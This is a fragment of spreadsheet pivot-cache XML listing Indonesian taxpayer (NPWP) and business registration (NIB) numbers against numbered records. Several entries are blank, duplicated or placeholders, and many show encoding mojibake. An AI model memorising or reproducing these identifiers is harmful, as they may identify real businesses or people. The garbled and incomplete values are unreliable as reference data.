    <s v="npwp"/>
    <s v="01‚Äì532‚Äì859‚Äì4‚Äì615‚Äì000"/>
  </r>
  <r>
    <x v="1834"/>
    <s v="nib"/>
    <n v="8120116212607"/>
  </r>
  <r>
    <x v="1835"/>
    <s v="npwp"/>
    <s v="16‚Äì823‚Äì569‚Äì5‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1835"/>
    <s v="nib"/>
    <n v="8120012231175"/>
  </r>
  <r>
    <x v="1836"/>
    <s v="npwp"/>
    <n v="149951428331000"/>
  </r>
  <r>
    <x v="1836"/>
    <s v="nib"/>
    <n v="9120215051115"/>
  </r>
  <r>
    <x v="1837"/>
    <s v="npwp"/>
    <s v="71‚Äì978‚Äì460‚Äì5‚Äì404‚Äì000"/>
  </r>
  <r>
    <x v="1837"/>
    <s v="nib"/>
    <n v="9120005192752"/>
  </r>
  <r>
    <x v="1838"/>
    <s v="npwp"/>
    <s v="75‚Äì502‚Äì310‚Äì8‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1838"/>
    <s v="nib"/>
    <n v="8120108872277"/>
  </r>
  <r>
    <x v="1839"/>
    <s v="npwp"/>
    <s v="02‚Äì889‚Äì368‚Äì5‚Äì418‚Äì001"/>
  </r>
  <r>
    <x v="1839"/>
    <s v="nib"/>
    <n v="9120005270692"/>
  </r>
  <r>
    <x v="1840"/>
    <s v="npwp"/>
    <s v="02‚Äì919‚Äì954‚Äì4‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1840"/>
    <s v="nib"/>
    <n v="206000902635"/>
  </r>
  <r>
    <x v="1841"/>
    <s v="npwp"/>
    <s v="02‚Äì081‚Äì949‚Äì6‚Äì624‚Äì000"/>
  </r>
  <r>
    <x v="1841"/>
    <s v="nib"/>
    <n v="8120211191565"/>
  </r>
  <r>
    <x v="1842"/>
    <s v="npwp"/>
    <s v="01‚Äì776‚Äì232‚Äì9‚Äì038‚Äì000"/>
  </r>
  <r>
    <x v="1842"/>
    <s v="nib"/>
    <n v="8120201920871"/>
  </r>
  <r>
    <x v="1843"/>
    <s v="npwp"/>
    <s v="80‚Äì551‚Äì444‚Äì5‚Äì043‚Äì000"/>
  </r>
  <r>
    <x v="1843"/>
    <s v="nib"/>
    <n v="812101962165"/>
  </r>
  <r>
    <x v="1844"/>
    <s v="npwp"/>
    <s v="02‚Äì119‚Äì848‚Äì6‚Äì832‚Äì000"/>
  </r>
  <r>
    <x v="1844"/>
    <s v="nib"/>
    <n v="205000991418"/>
  </r>
  <r>
    <x v="1845"/>
    <s v="npwp"/>
    <s v="72‚Äì602‚Äì818‚Äì6‚Äì071‚Äì000"/>
  </r>
  <r>
    <x v="1845"/>
    <s v="nib"/>
    <n v="8120005920342"/>
  </r>
  <r>
    <x v="1846"/>
    <s v="npwp"/>
    <s v="86‚Äì234‚Äì067‚Äì6‚Äì727‚Äì000"/>
  </r>
  <r>
    <x v="1846"/>
    <s v="nib"/>
    <n v="8120110171098"/>
  </r>
  <r>
    <x v="1847"/>
    <s v="npwp"/>
    <s v="80‚Äì968‚Äì425‚Äì1‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="1847"/>
    <s v="nib"/>
    <n v="9120207252371"/>
  </r>
  <r>
    <x v="1848"/>
    <s v="npwp"/>
    <s v="81‚Äì734‚Äì404‚Äì7‚Äì616‚Äì000"/>
  </r>
  <r>
    <x v="1848"/>
    <s v="nib"/>
    <n v="9120216053603"/>
  </r>
  <r>
    <x v="1849"/>
    <s v="npwp"/>
    <s v="92‚Äì672‚Äì884‚Äì1‚Äì334‚Äì000"/>
  </r>
  <r>
    <x v="1849"/>
    <s v="nib"/>
    <n v="9120201913308"/>
  </r>
  <r>
    <x v="1850"/>
    <s v="npwp"/>
    <s v="06‚Äì797‚Äì243‚Äì0‚Äì306‚Äì000"/>
  </r>
  <r>
    <x v="1850"/>
    <s v="nib"/>
    <n v="9120108922836"/>
  </r>
  <r>
    <x v="1851"/>
    <s v="npwp"/>
    <s v="93.123.861.2-214.000"/>
  </r>
  <r>
    <x v="1851"/>
    <s v="nib"/>
    <n v="9120311081442"/>
  </r>
  <r>
    <x v="1852"/>
    <s v="npwp"/>
    <s v="01‚Äì070‚Äì707‚Äì3‚Äì624‚Äì001"/>
  </r>
  <r>
    <x v="1852"/>
    <s v="nib"/>
    <n v="8120219101125"/>
  </r>
  <r>
    <x v="1853"/>
    <s v="npwp"/>
    <s v="93‚Äì213‚Äì549‚Äì4‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1853"/>
    <s v="nib"/>
    <n v="9120114012918"/>
  </r>
  <r>
    <x v="1854"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì645‚Äì001"/>
  </r>
  <r>
    <x v="1854"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="1855"/>
    <s v="npwp"/>
    <s v="75‚Äì785‚Äì332‚Äì0‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1855"/>
    <s v="nib"/>
    <n v="9120117032655"/>
  </r>
  <r>
    <x v="1856"/>
    <s v="npwp"/>
    <s v="70‚Äì609‚Äì968‚Äì6‚Äì619‚Äì000"/>
  </r>
  <r>
    <x v="1857"/>
    <s v="npwp"/>
    <s v="92‚Äì025‚Äì071‚Äì9‚Äì517‚Äì000"/>
  </r>
  <r>
    <x v="1857"/>
    <s v="nib"/>
    <n v="9120306710254"/>
  </r>
  <r>
    <x v="1858"/>
    <s v="npwp"/>
    <s v="21‚Äì038‚Äì082‚Äì0‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1858"/>
    <s v="nib"/>
    <n v="8120002792833"/>
  </r>
  <r>
    <x v="1859"/>
    <s v="npwp"/>
    <s v="76‚Äì249‚Äì374‚Äì0‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1859"/>
    <s v="nib"/>
    <n v="9120209861561"/>
  </r>
  <r>
    <x v="1860"/>
    <s v="npwp"/>
    <n v="93056338791500"/>
  </r>
  <r>
    <x v="1860"/>
    <s v="nib"/>
    <n v="9120017090943"/>
  </r>
  <r>
    <x v="1861"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1861"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1862"/>
    <s v="npwp"/>
    <s v="02‚Äì257‚Äì410‚Äì7‚Äì631‚Äì000"/>
  </r>
  <r>
    <x v="1862"/>
    <s v="nib"/>
    <n v="8120109890111"/>
  </r>
  <r>
    <x v="1863"/>
    <s v="nib"/>
    <n v="8120000821515"/>
  </r>
  <r>
    <x v="1864"/>
    <s v="npwp"/>
    <s v="92‚Äì813‚Äì489‚Äì9‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1864"/>
    <s v="nib"/>
    <n v="9120208933005"/>
  </r>
  <r>
    <x v="1865"/>
    <s v="npwp"/>
    <s v="01‚Äì001‚Äì723‚Äì4‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1865"/>
    <s v="nib"/>
    <n v="8120018201843"/>
  </r>
  <r>
    <x v="1866"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1866"/>
    <s v="nib"/>
    <n v="8120011221259"/>
  </r>
  <r>
    <x v="1867"/>
    <s v="npwp"/>
    <s v="02‚Äì978‚Äì582‚Äì1‚Äì451‚Äì000"/>
  </r>
  <r>
    <x v="1867"/>
    <s v="nib"/>
    <n v="8120006872691"/>
  </r>
  <r>
    <x v="1868"/>
    <s v="npwp"/>
    <s v="92‚Äì463‚Äì367‚Äì0‚Äì808‚Äì000"/>
  </r>
  <r>
    <x v="1868"/>
    <s v="nib"/>
    <n v="9120007891005"/>
  </r>
  <r>
    <x v="1869"/>
    <s v="npwp"/>
    <s v="83‚Äì206‚Äì559‚Äì3‚Äì105‚Äì000"/>
  </r>
  <r>
    <x v="1869"/>
    <s v="nib"/>
    <n v="9120401742356"/>
  </r>
  <r>
    <x v="1870"/>
    <s v="npwp"/>
    <s v="93‚Äì228‚Äì373‚Äì2‚Äì921‚Äì000"/>
  </r>
  <r>
    <x v="1870"/>
    <s v="nib"/>
    <n v="9120011170627"/>
  </r>
  <r>
    <x v="1871"/>
    <s v="npwp"/>
    <s v="02‚Äì638‚Äì777‚Äì9‚Äì955‚Äì001"/>
  </r>
  <r>
    <x v="1871"/>
    <s v="nib"/>
    <n v="8120312042393"/>
  </r>
  <r>
    <x v="1872"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1872"/>
    <s v="nib"/>
    <n v="9120201772324"/>
  </r>
  <r>
    <x v="1873"/>
    <s v="npwp"/>
    <s v="01‚Äì223‚Äì331‚Äì8‚Äì123‚Äì000"/>
  </r>
  <r>
    <x v="1873"/>
    <s v="nib"/>
    <n v="8120001851172"/>
  </r>
  <r>
    <x v="1874"/>
    <s v="npwp"/>
    <s v="92‚Äì970‚Äì000‚Äì3‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1874"/>
    <s v="nib"/>
    <n v="9120119080335"/>
  </r>
  <r>
    <x v="1875"/>
    <s v="npwp"/>
    <s v="82‚Äì565‚Äì301‚Äì7‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="1875"/>
    <s v="nib"/>
    <n v="8120115211908"/>
  </r>
  <r>
    <x v="1876"/>
    <s v="npwp"/>
    <s v="02‚Äì881‚Äì392‚Äì1‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="1876"/>
    <s v="nib"/>
    <n v="9120307232559"/>
  </r>
  <r>
    <x v="1877"/>
    <s v="npwp"/>
    <s v="02‚Äì881‚Äì392‚Äì1‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="1877"/>
    <s v="nib"/>
    <n v="9120307232559"/>
  </r>
  <r>
    <x v="1878"/>
    <s v="npwp"/>
    <s v="36‚Äì528‚Äì089‚Äì0‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="1878"/>
    <s v="nib"/>
    <n v="9120018161041"/>
  </r>
  <r>
    <x v="1879"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1879"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1880"/>
    <s v="npwp"/>
    <s v="93‚Äì336‚Äì128‚Äì9‚Äì404‚Äì000"/>
  </r>
  <r>
    <x v="1880"/>
    <s v="nib"/>
    <n v="9120113120153"/>
  </r>
  <r>
    <x v="1881"/>
    <s v="npwp"/>
    <s v="93‚Äì185‚Äì868‚Äì2‚Äì806‚Äì000"/>
  </r>
  <r>
    <x v="1881"/>
    <s v="nib"/>
    <n v="9120414032745"/>
  </r>
  <r>
    <x v="1882"/>
    <s v="npwp"/>
    <s v="02‚Äì853‚Äì573‚Äì0‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1882"/>
    <s v="nib"/>
    <n v="9120204172152"/>
  </r>
  <r>
    <x v="1883"/>
    <s v="npwp"/>
    <s v="02‚Äì342‚Äì733‚Äì9‚Äì113‚Äì000"/>
  </r>
  <r>
    <x v="1883"/>
    <s v="nib"/>
    <n v="8120012090268"/>
  </r>
  <r>
    <x v="1884"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì951‚Äì001"/>
  </r>
  <r>
    <x v="1884"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="1885"/>
    <s v="npwp"/>
    <s v="01‚Äì517‚Äì118‚Äì4‚Äì426‚Äì001"/>
  </r>
  <r>
    <x v="1885"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="1886"/>
    <s v="npwp"/>
    <s v="91‚Äì531‚Äì882‚Äì8‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1886"/>
    <s v="nib"/>
    <n v="9120201942075"/>
  </r>
  <r>
    <x v="1887"/>
    <s v="npwp"/>
    <s v="03‚Äì126‚Äì207‚Äì4‚Äì722‚Äì000"/>
  </r>
  <r>
    <x v="1887"/>
    <s v="nib"/>
    <n v="8120001812472"/>
  </r>
  <r>
    <x v="1888"/>
    <s v="npwp"/>
    <s v="07‚Äì060‚Äì103‚Äì4‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1888"/>
    <s v="nib"/>
    <n v="8120312201625"/>
  </r>
  <r>
    <x v="1889"/>
    <s v="npwp"/>
    <s v="02‚Äì438‚Äì410‚Äì9‚Äì403‚Äì000"/>
  </r>
  <r>
    <x v="1889"/>
    <s v="nib"/>
    <n v="8120003902362"/>
  </r>
  <r>
    <x v="1890"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1891"/>
    <s v="npwp"/>
    <s v="92‚Äì470‚Äì894‚Äì4‚Äì611‚Äì000"/>
  </r>
  <r>
    <x v="1891"/>
    <s v="nib"/>
    <n v="9120303832877"/>
  </r>
  <r>
    <x v="1892"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1892"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1893"/>
    <s v="npwp"/>
    <s v="91‚Äì047‚Äì759‚Äì5‚Äì645‚Äì000"/>
  </r>
  <r>
    <x v="1893"/>
    <s v="nib"/>
    <n v="9120005700293"/>
  </r>
  <r>
    <x v="1894"/>
    <s v="npwp"/>
    <s v="14‚Äì472‚Äì557‚Äì9‚Äì307‚Äì000"/>
  </r>
  <r>
    <x v="1894"/>
    <s v="nib"/>
    <n v="9120109703404"/>
  </r>
  <r>
    <x v="1895"/>
    <s v="npwp"/>
    <s v="07‚Äì124‚Äì890‚Äì0‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1895"/>
    <s v="nib"/>
    <n v="8120100942851"/>
  </r>
  <r>
    <x v="1896"/>
    <s v="npwp"/>
    <s v="93‚Äì032‚Äì375‚Äì3‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1896"/>
    <s v="nib"/>
    <n v="9120417060595"/>
  </r>
  <r>
    <x v="1897"/>
    <s v="npwp"/>
    <s v="72‚Äì464‚Äì032‚Äì1‚Äì922‚Äì000"/>
  </r>
  <r>
    <x v="1897"/>
    <s v="nib"/>
    <n v="296010150866"/>
  </r>
  <r>
    <x v="1898"/>
    <s v="npwp"/>
    <s v="85‚Äì127‚Äì845‚Äì7‚Äì626‚Äì000"/>
  </r>
  <r>
    <x v="1898"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1899"/>
    <s v="npwp"/>
    <s v="02‚Äì365‚Äì443‚Äì7‚Äì212‚Äì000"/>
  </r>
  <r>
    <x v="1899"/>
    <s v="nib"/>
    <n v="8120214073117"/>
  </r>
  <r>
    <x v="1900"/>
    <s v="npwp"/>
    <s v="65‚Äì129‚Äì315‚Äì9‚Äì315‚Äì000"/>
  </r>
  <r>
    <x v="1900"/>
    <s v="nib"/>
    <n v="2551554"/>
  </r>
  <r>
    <x v="1901"/>
    <s v="npwp"/>
    <s v="81‚Äì686‚Äì892‚Äì1‚Äì028‚Äì000"/>
  </r>
  <r>
    <x v="1901"/>
    <s v="nib"/>
    <n v="9120308780526"/>
  </r>
  <r>
    <x v="1902"/>
    <s v="npwp"/>
    <s v="02‚Äì032‚Äì698‚Äì9‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1902"/>
    <s v="nib"/>
    <n v="8120210190089"/>
  </r>
  <r>
    <x v="1903"/>
    <s v="npwp"/>
    <s v="25‚Äì014‚Äì484‚Äì7‚Äì005‚Äì000"/>
  </r>
  <r>
    <x v="1903"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1904"/>
    <s v="npwp"/>
    <s v="02‚Äì277‚Äì658‚Äì5‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1904"/>
    <s v="nib"/>
    <n v="8120118001752"/>
  </r>
  <r>
    <x v="1905"/>
    <s v="npwp"/>
    <s v="81‚Äì591‚Äì864‚Äì4‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1905"/>
    <s v="nib"/>
    <n v="8120105742944"/>
  </r>
  <r>
    <x v="1906"/>
    <s v="npwp"/>
    <s v="03‚Äì209‚Äì191‚Äì0‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1906"/>
    <s v="nib"/>
    <n v="9120208161573"/>
  </r>
  <r>
    <x v="1907"/>
    <s v="npwp"/>
    <s v="92‚Äì778‚Äì701‚Äì0‚Äì013‚Äì000"/>
  </r>
  <r>
    <x v="1907"/>
    <s v="nib"/>
    <n v="9120317041"/>
  </r>
  <r>
    <x v="1908"/>
    <s v="npwp"/>
    <s v="92‚Äì001‚Äì439‚Äì6‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1908"/>
    <s v="nib"/>
    <n v="9120013020893"/>
  </r>
  <r>
    <x v="1909"/>
    <s v="npwp"/>
    <s v="92‚Äì066‚Äì715‚Äì1‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1909"/>
    <s v="nib"/>
    <n v="9120504853106"/>
  </r>
  <r>
    <x v="1910"/>
    <s v="npwp"/>
    <s v="02‚Äì776‚Äì585‚Äì8‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1910"/>
    <s v="nib"/>
    <n v="8120118001752"/>
  </r>
  <r>
    <x v="1911"/>
    <s v="npwp"/>
    <s v="02‚Äì027‚Äì065‚Äì8‚Äì102‚Äì000"/>
  </r>
  <r>
    <x v="1911"/>
    <s v="nib"/>
    <n v="9120304662971"/>
  </r>
  <r>
    <x v="1912"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1912"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1913"/>
    <s v="npwp"/>
    <s v="03‚Äì261‚Äì395‚Äì2‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1913"/>
    <s v="nib"/>
    <n v="8120216272563"/>
  </r>
  <r>
    <x v="1914"/>
    <s v="npwp"/>
    <s v="81‚Äì495‚Äì075‚Äì4‚Äì414‚Äì000"/>
  </r>
  <r>
    <x v="1914"/>
    <s v="nib"/>
    <n v="8120016141574"/>
  </r>
  <r>
    <x v="1915"/>
    <s v="npwp"/>
    <s v="24‚Äì357‚Äì842‚Äì4‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="1915"/>
    <s v="nib"/>
    <n v="9120214280039"/>
  </r>
  <r>
    <x v="1916"/>
    <s v="npwp"/>
    <s v="71‚Äì643‚Äì034‚Äì3‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1916"/>
    <s v="nib"/>
    <n v="9120303941621"/>
  </r>
  <r>
    <x v="1917"/>
    <s v="npwp"/>
    <s v="08‚Äì441‚Äì371‚Äì5‚Äì301‚Äì000"/>
  </r>
  <r>
    <x v="1917"/>
    <s v="nib"/>
    <n v="9120108491556"/>
  </r>
  <r>
    <x v="1918"/>
    <s v="npwp"/>
    <s v="16‚Äì343‚Äì583‚Äì7‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1918"/>
    <s v="nib"/>
    <n v="9120314240951"/>
  </r>
  <r>
    <x v="1919"/>
    <s v="npwp"/>
    <s v="02‚Äì293‚Äì483‚Äì0‚Äì223‚Äì001"/>
  </r>
  <r>
    <x v="1919"/>
    <s v="nib"/>
    <n v="9120300410197"/>
  </r>
  <r>
    <x v="1920"/>
    <s v="npwp"/>
    <s v="93‚Äì205‚Äì718‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1920"/>
    <s v="nib"/>
    <n v="9120213072421"/>
  </r>
  <r>
    <x v="1921"/>
    <s v="npwp"/>
    <n v="78834495602000"/>
  </r>
  <r>
    <x v="1921"/>
    <s v="nib"/>
    <n v="9120014200668"/>
  </r>
  <r>
    <x v="1922"/>
    <s v="npwp"/>
    <s v="03‚Äì079‚Äì872‚Äì2‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1922"/>
    <s v="nib"/>
    <n v="9120009571443"/>
  </r>
  <r>
    <x v="1923"/>
    <s v="npwp"/>
    <n v="919768739823000"/>
  </r>
  <r>
    <x v="1923"/>
    <s v="nib"/>
    <n v="9120016291021"/>
  </r>
  <r>
    <x v="1924"/>
    <s v="npwp"/>
    <s v="01‚Äì517‚Äì118‚Äì4‚Äì507‚Äì001"/>
  </r>
  <r>
    <x v="1924"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="1925"/>
    <s v="npwp"/>
    <s v="83‚Äì339‚Äì746‚Äì6‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1925"/>
    <s v="nib"/>
    <n v="9120202342013"/>
  </r>
  <r>
    <x v="1926"/>
    <s v="npwp"/>
    <s v="81‚Äì104‚Äì778‚Äì6‚Äì541‚Äì000"/>
  </r>
  <r>
    <x v="1926"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1927"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1927"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="1928"/>
    <s v="npwp"/>
    <s v="85‚Äì838‚Äì859‚Äì8‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="1928"/>
    <s v="nib"/>
    <n v="8120114003603"/>
  </r>
  <r>
    <x v="1929"/>
    <s v="npwp"/>
    <s v="93‚Äì073‚Äì981‚Äì8‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1929"/>
    <s v="nib"/>
    <n v="9120217090798"/>
  </r>
  <r>
    <x v="1930"/>
    <s v="npwp"/>
    <s v="91‚Äì272‚Äì023‚Äì2‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="1930"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1931"/>
    <s v="nib"/>
    <n v="9120508753203"/>
  </r>
  <r>
    <x v="1932"/>
    <s v="nib"/>
    <n v="123"/>
  </r>
  <r>
    <x v="1933"/>
    <s v="nib"/>
    <n v="8120118030181"/>
  </r>
  <r>
    <x v="1934"/>
    <s v="nib"/>
    <n v="8120008802502"/>
  </r>
  <r>
    <x v="1935"/>
    <s v="nib"/>
    <n v="9120108991539"/>
  </r>
  <r>
    <x v="1936"/>
    <s v="nib"/>
    <n v="220004120228"/>
  </r>
  <r>
    <x v="1935"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1937"/>
    <s v="nib"/>
    <n v="9120100840125"/>
  </r>
  <r>
    <x v="1938"/>
    <s v="nib"/>
    <n v="8120003851916"/>
  </r>
  <r>
    <x v="1939"/>
    <s v="nib"/>
    <n v="8120206860214"/>
  </r>
  <r>
    <x v="1934"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1940"/>
    <s v="nib"/>
    <n v="8120005811069"/>
  </r>
  <r>
    <x v="1941"/>
    <s v="nib"/>
    <n v="220004120228"/>
  </r>
  <r>
    <x v="1940"/>
    <s v="npwp"/>
    <s v="83.363.982.6-643.000"/>
  </r>
  <r>
    <x v="1942"/>
    <s v="nib"/>
    <n v="8120004860535"/>
  </r>
  <r>
    <x v="1943"/>
    <s v="nib"/>
    <n v="220101190687"/>
  </r>
  <r>
    <x v="1944"/>
    <s v="nib"/>
    <n v="220106170635"/>
  </r>
  <r>
    <x v="205"/>
    <s v="nib"/>
    <n v="8120103840915"/>
  </r>
  <r>
    <x v="408"/>
    <s v="nib"/>
    <n v="8120001721627"/>
  </r>
  <r>
    <x v="541"/>
    <s v="nib"/>
    <n v="8120000791319"/>
  </r>
  <r>
    <x v="1945"/>
    <s v="nib"/>
    <n v="9120013273501"/>
  </r>
  <r>
    <x v="1946"/>
    <s v="nib"/>
    <n v="9120114212033"/>
  </r>
  <r>
    <x v="477"/>
    <s v="nib"/>
    <n v="9120117083812"/>
  </r>
  <r>
    <x v="1947"/>
    <s v="nib"/>
    <n v="9120202842435"/>
  </r>
  <r>
    <x v="1948"/>
    <s v="nib"/>
    <n v="8120118000139"/>
  </r>
  <r>
    <x v="1949"/>
    <s v="nib"/>
    <n v="8104024824"/>
  </r>
  <r>
    <x v="1945"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1950"/>
    <s v="nib"/>
    <n v="8120012260346"/>
  </r>
  <r>
    <x v="1951"/>
    <s v="nib"/>
    <n v="9120107742824"/>
  </r>
  <r>
    <x v="1952"/>
    <s v="nib"/>
    <n v="8120014122233"/>
  </r>
  <r>
    <x v="1938"/>
    <s v="npwp"/>
    <s v="01.696.446.2-941.001"/>
  </r>
  <r>
    <x v="1947"/>
    <s v="npwp"/>
    <s v="92.387.529.8-617.000"/>
  </r>
  <r>
    <x v="1953"/>
    <s v="nib"/>
    <n v="9120202111174"/>
  </r>
  <r>
    <x v="1022"/>
    <s v="nib"/>
    <n v="8120111020744"/>
  </r>
  <r>
    <x v="1856"/>
    <s v="nib"/>
    <n v="8120311071686"/>
  </r>
  <r>
    <x v="1954"/>
    <s v="nib"/>
    <n v="9120408982568"/>
  </r>
  <r>
    <x v="575"/>
    <s v="nib"/>
    <n v="9120201142256"/>
  </r>
  <r>
    <x v="1955"/>
    <s v="nib"/>
    <n v="9120102522631"/>
  </r>
  <r>
    <x v="324"/>
    <s v="nib"/>
    <n v="8120007870315"/>
  </r>
  <r>
    <x v="1956"/>
    <s v="nib"/>
    <n v="9120502782998"/>
  </r>
  <r>
    <x v="1957"/>
    <s v="nib"/>
    <n v="9120412271603"/>
  </r>
  <r>
    <x v="1958"/>
    <s v="nib"/>
    <n v="220106191504"/>
  </r>
  <r>
    <x v="1959"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1959"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1960"/>
    <s v="nib"/>
    <n v="9120106762024"/>
  </r>
  <r>
    <x v="1960"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1961"/>
    <s v="nib"/>
    <n v="8120119281993"/>
  </r>
  <r>
    <x v="592"/>
    <s v="nib"/>
    <n v="9120201350843"/>
  </r>
  <r>
    <x v="1962"/>
    <s v="nib"/>
    <n v="9120003540563"/>
  </r>
  <r>
    <x v="1942"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="323"/>
    <s v="nib"/>
    <n v="8120005860639"/>
  </r>
  <r>
    <x v="1963"/>
    <s v="nib"/>
    <n v="8120016132495"/>
  </r>
  <r>
    <x v="1961"/>
    <s v="npwp"/>
    <s v="01.083.278.0-651.000"/>
  </r>
  <r>
    <x v="1964"/>
    <s v="nib"/>
    <n v="9120208242369"/>
  </r>
  <r>
    <x v="1965"/>
    <s v="nib"/>
    <n v="890"/>
  </r>
  <r>
    <x v="416"/>
    <s v="nib"/>
    <n v="8120004712632"/>
  </r>
  <r>
    <x v="1966"/>
    <s v="nib"/>
    <n v="9120214290551"/>
  </r>
  <r>
    <x v="438"/>
    <s v="nib"/>
    <n v="8120305890614"/>
  </r>
  <r>
    <x v="1952"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1966"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1967"/>
    <s v="nib"/>
    <n v="9120302642919"/>
  </r>
  <r>
    <x v="1968"/>
    <s v="nib"/>
    <n v="8120002841036"/>
  </r>
  <r>
    <x v="1969"/>
    <s v="nib"/>
    <n v="8120002762444"/>
  </r>
  <r>
    <x v="1969"/>
    <s v="npwp"/>
    <s v="74.719.423.1-507.000"/>
  </r>
  <r>
    <x v="1970"/>
    <s v="nib"/>
    <n v="9120408362861"/>
  </r>
  <r>
    <x v="1971"/>
    <s v="nib"/>
    <n v="8120118030181"/>
  </r>
  <r>
    <x v="1972"/>
    <s v="nib"/>
    <n v="8120108732349"/>
  </r>
  <r>
    <x v="1973"/>
    <s v="nib"/>
    <n v="8120108732349"/>
  </r>
  <r>
    <x v="1974"/>
    <s v="nib"/>
    <n v="8120108732349"/>
  </r>
  <r>
    <x v="1975"/>
    <s v="nib"/>
    <n v="8120107860835"/>
  </r>
  <r>
    <x v="1976"/>
    <s v="nib"/>
    <n v="8120309830713"/>
  </r>
  <r>
    <x v="1977"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="1976"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1978"/>
    <s v="nib"/>
    <n v="9120005982557"/>
  </r>
  <r>
    <x v="1979"/>
    <s v="nib"/>
    <n v="9120213192075"/>
  </r>
  <r>
    <x v="1978"/>
    <s v="npwp"/>
    <s v="06.702.366.3-124.000"/>
  </r>
  <r>
    <x v="1980"/>
    <s v="nib"/>
    <n v="9120303332802"/>
  </r>
  <r>
    <x v="1981"/>
    <s v="nib"/>
    <n v="9120003950366"/>
  </r>
  <r>
    <x v="1981"/>
    <s v="npwp"/>
    <s v="92.613.395.0-255.000"/>
  </r>
  <r>
    <x v="1982"/>
    <s v="nib"/>
    <n v="9120104262162"/>
  </r>
  <r>
    <x v="1983"/>
    <s v="nib"/>
    <n v="8120108732349"/>
  </r>
  <r>
    <x v="1984"/>
    <s v="nib"/>
    <n v="8120213162973"/>
  </r>
  <r>
    <x v="1985"/>
    <s v="nib"/>
    <n v="8120109752973"/>
  </r>
  <r>
    <x v="1986"/>
    <s v="nib"/>
    <n v="8120106880689"/>
  </r>
  <r>
    <x v="1987"/>
    <s v="nib"/>
    <n v="220003101452"/>
  </r>
  <r>
    <x v="1988"/>
    <s v="nib"/>
    <n v="220003101452"/>
  </r>
  <r>
    <x v="989"/>
    <s v="nib"/>
    <s v="NIB_8120102941602"/>
  </r>
  <r>
    <x v="1989"/>
    <s v="nib"/>
    <n v="8120108960275"/>
  </r>
  <r>
    <x v="1990"/>
    <s v="nib"/>
    <n v="8120004791485"/>
  </r>
  <r>
    <x v="1990"/>
    <s v="npwp"/>
    <s v="01.870.966.7-022.000"/>
  </r>
